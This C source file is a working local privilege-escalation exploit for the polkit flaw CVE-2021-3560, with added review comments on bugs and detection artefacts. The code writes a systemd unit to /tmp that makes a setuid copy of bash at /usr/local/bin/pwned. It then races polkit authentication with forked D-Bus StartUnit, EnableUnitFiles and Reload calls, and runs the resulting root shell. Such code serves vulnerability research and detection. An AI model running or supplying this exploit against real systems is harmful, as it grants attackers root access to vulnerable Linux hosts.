#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <dbus/dbus.h>
#include <unistd.h>
#include <gio/gio.h>
#include <gio/gdbusconnection.h>
#include <dbus/dbus-glib-lowlevel.h>
#include "agent.h"
/* Logging helpers: every line is prefixed with the calling pid so output from
 * the forked worker processes created in main() can be told apart.
 * NOTE(review): dprintf() is also a POSIX function declared in <stdio.h>
 * (included above); a function-like macro of the same name shadows it.
 * `##__VA_ARGS__` is a GNU extension, not ISO C. */
#define dprintf(format, ...) g_print("pid:%d - "format, getpid(), ##__VA_ARGS__)
#define dprintferr(format, ...) g_printerr("pid:%d - "format, getpid(), ##__VA_ARGS__)
/* Argument record shared with the worker threads: the unit name taken from
 * argv[1] (or the default chosen in main) and the path under /tmp where
 * write_unit_file() drops the unit file.
 * NOTE(review): both fields are fixed 1024-byte buffers, and main() fills them
 * with memcpy()/sprintf() without a length check, so a command-line name of
 * 1024 bytes or more overruns them (see main). */
struct arg_struct
{
    char name[1024];
    char path[1024];
} *arguments;  /* single global instance, allocated in main(); never freed */
/*
 * Thread entry point: asks systemd, over the system bus, to start the unit
 * named in args->name ("StartUnit" on org.freedesktop.systemd1.Manager with
 * job mode "replace").
 *
 * @param arguments  the global struct arg_struct, passed as void* to fit the
 *                   pthread_create() start-routine signature. The parameter
 *                   shadows the file-scope variable of the same name.
 * @return           always 0 (NULL); the reply, if any, is discarded.
 *
 * NOTE(review): g_bus_get_sync() and g_dbus_connection_call_sync() are called
 * with NULL GError out-parameters and the connection is neither NULL-checked
 * nor unreferenced, so a failed bus connection or a rejected call is silent.
 * From a monitoring standpoint this is a StartUnit request from a short-lived
 * unprivileged process carrying the ALLOW_INTERACTIVE_AUTHORIZATION flag.
 */
void *method_call_start_service(void *arguments)
{
    struct arg_struct *args = arguments;
    char *name = args->name;
    dprintf("[*] trying to start systemd service '%s' ...\n", name);
    GDBusConnection *connection = g_bus_get_sync (G_BUS_TYPE_SYSTEM, NULL, NULL);
    /* The flag tells the bus the caller is willing to wait for interactive
     * authorization, which is why each worker process also runs
     * start_authentication_agent() (see main). Timeout -1 = default. */
    g_dbus_connection_call_sync (connection, "org.freedesktop.systemd1" ,
                                 "/org/freedesktop/systemd1",
                                 "org.freedesktop.systemd1.Manager",
                                 "StartUnit",
                                 g_variant_new("(ss)", name, "replace"),
                                 NULL, G_DBUS_CALL_FLAGS_ALLOW_INTERACTIVE_AUTHORIZATION, -1, NULL, NULL);
    return 0;
}
/*
 * Thread entry point: asks systemd to re-read its unit files ("Reload" on
 * org.freedesktop.systemd1.Manager, no arguments).
 *
 * Declared with an empty parameter list `()` (unspecified parameters in C11);
 * main() passes it to pthread_create(), which will invoke it with one void*
 * argument that this function simply ignores. A `(void *)` parameter would
 * make the signature match the start-routine type properly.
 *
 * @return always 0 (NULL).
 *
 * NOTE(review): same error handling gaps as method_call_start_service(): NULL
 * GError, unchecked and never-unreferenced connection.
 */
void *method_call_reload_systemd()
{
    dprintf("[*] trying to reload systemd daemon ...\n");
    GDBusConnection *connection = g_bus_get_sync (G_BUS_TYPE_SYSTEM, NULL, NULL);
    g_dbus_connection_call_sync(connection, "org.freedesktop.systemd1",
                                "/org/freedesktop/systemd1",
                                "org.freedesktop.systemd1.Manager",
                                "Reload",
                                NULL, /* no args */
                                NULL, G_DBUS_CALL_FLAGS_ALLOW_INTERACTIVE_AUTHORIZATION, -1, NULL, NULL);
    return 0;
}
/*
 * Thread entry point: asks systemd to enable the unit file at args->path
 * ("EnableUnitFiles" on org.freedesktop.systemd1.Manager).
 *
 * @param arguments  the global struct arg_struct, passed as void*; shadows the
 *                   file-scope variable of the same name.
 * @return           always 0 (NULL); the reply is discarded.
 *
 * NOTE(review): error handling is the same as in the sibling method_call_*
 * functions — NULL GError, unchecked and leaked connection. A unit file path
 * under /tmp being passed to EnableUnitFiles is itself a strong anomaly
 * indicator: legitimate units live in the systemd unit directories.
 */
void *method_call_install_service(void *arguments){
    struct arg_struct *args = arguments;
    /* "^as" expects a NULL-terminated string array, hence the trailing NULL. */
    char *service_name[] = {args->path, NULL};
    dprintf("[*] trying to enable system unit file \'%s\' ...\n", service_name[0]);
    GDBusConnection *connection = g_bus_get_sync (G_BUS_TYPE_SYSTEM, NULL, NULL);
    /* (^asbb) = files array plus the two booleans of EnableUnitFiles
     * (runtime, force); both are set to 1 here. */
    g_dbus_connection_call_sync(connection, "org.freedesktop.systemd1",
                                "/org/freedesktop/systemd1",
                                "org.freedesktop.systemd1.Manager",
                                "EnableUnitFiles",
                                g_variant_new ("(^asbb)", service_name, 1, 1),
                                NULL, G_DBUS_CALL_FLAGS_ALLOW_INTERACTIVE_AUTHORIZATION, -1, NULL, NULL);
    return 0;
}
/*
 * Writes a minimal systemd unit file to `path` (truncating any existing
 * file). The unit's ExecStart copies /bin/bash to /usr/local/bin/pwned and
 * sets the setuid bit on the copy; that path is what main() polls for.
 *
 * @param path  destination file; main() passes "/tmp/<name>".
 *
 * Failure is silent: if fopen() fails nothing is written and no error is
 * reported, and the fprintf()/fclose() return values are not checked either.
 * For defenders, the artefacts to look for are a unit file under /tmp and a
 * setuid copy of bash at /usr/local/bin/pwned.
 */
void write_unit_file(char *path) {
    FILE *fp = fopen(path, "w");
    if (fp){
        fprintf(fp, "[Unit]\nAllowIsolate=no\n\n[Service]\n"
                    "ExecStart=/bin/bash -c 'cp /bin/bash /usr/local/bin/pwned; chmod +s /usr/local/bin/pwned'");
        fclose(fp);
    }
}
/*
 * Entry point. Builds the argument record, writes the unit file, then forks
 * twice so that four processes exist: three workers that each register an
 * authentication agent (start_authentication_agent, declared in agent.h, not
 * shown here) and issue one systemd D-Bus call, and the original parent,
 * which polls for the setuid binary produced by the unit and executes it.
 *
 * @param argc/argv  optional argv[1] is the unit name; default "pwnkit.service".
 * @return           0 on success or for worker processes, 1 if the parent
 *                   never sees /usr/local/bin/pwned within its poll window.
 *
 * NOTE(review): pthread_t and pthread_create() are used without a visible
 * <pthread.h> include — presumably it comes in via agent.h; confirm.
 * NOTE(review): argv[1] is copied with memcpy(strlen(name)) and then
 * sprintf'd into a 1024-byte buffer with a "/tmp/" prefix; no length check,
 * so a long argument overruns both fields of struct arg_struct. malloc() is
 * also unchecked. Worker threads are never joined; each worker process simply
 * exits after sleep(3), which tears them down.
 */
int main(int argc, char *argv[])
{
    char *name;
    pthread_t t1 , t2;
    dprintf("[ polkit CVE-2021-3560 exploit ] - RicterZ @ 360 Noah Lab, C writed by Swing @ chaitin\n");
    if (argc == 1) {
        name = "pwnkit.service";
    } else {
        name = argv[1];
    }
    /* The record is filled before the forks, so every process gets its own
     * (copy-on-write) copy with identical contents. */
    arguments = malloc(sizeof(struct arg_struct) * 1);
    memset(arguments, 0, sizeof(struct arg_struct));
    memcpy(arguments->name, name, strlen(name));
    sprintf(arguments->path, "/tmp/%s", arguments->name);
    write_unit_file(arguments->path);
    /* Two unconditional forks -> four processes. The (pid_1, pid_2) pair
     * identifies each one in the branches below. */
    int pid_1 = fork();
    int pid_2 = fork();
    if (pid_1 == 0 && pid_2) {
        /* first child: agent thread, then StartUnit */
        pthread_create(&t1, NULL, &start_authentication_agent, NULL);
        sleep(1);
        pthread_create(&t2, NULL, &method_call_start_service, (void *)arguments);
    } else if (pid_2 == 0 && pid_1) {
        /* parent's second child: agent thread, then EnableUnitFiles */
        pthread_create(&t1, NULL, &start_authentication_agent, NULL);
        sleep(1);
        pthread_create(&t2, NULL, &method_call_install_service, (void *)arguments);
    } else if (pid_1 == 0 && pid_2 == 0) {
        /* grandchild: agent thread, then Reload */
        pthread_create(&t1, NULL, &start_authentication_agent, NULL);
        sleep(1);
        pthread_create(&t2, NULL, &method_call_reload_systemd, NULL);
    } else {
        /* original parent: poll up to ~5 s for the setuid binary the unit
         * creates, then run it via system(). */
        dprintf("[*] main process running ...\n");
        for (int i=0; i<5; i++) {
            sleep(1);
            if( access("/usr/local/bin/pwned", F_OK) == 0 ) {
                dprintf("[+] file exists, popping root shell ...\n");
                system("/usr/local/bin/pwned -p");
                return 0;
            }
        }
        dprintf("[-] exploit failed, please try again");
        return 1;
    }
    /* Worker processes: stay alive briefly for the threads, then exit without
     * joining them. */
    sleep(3);
    return 0;
}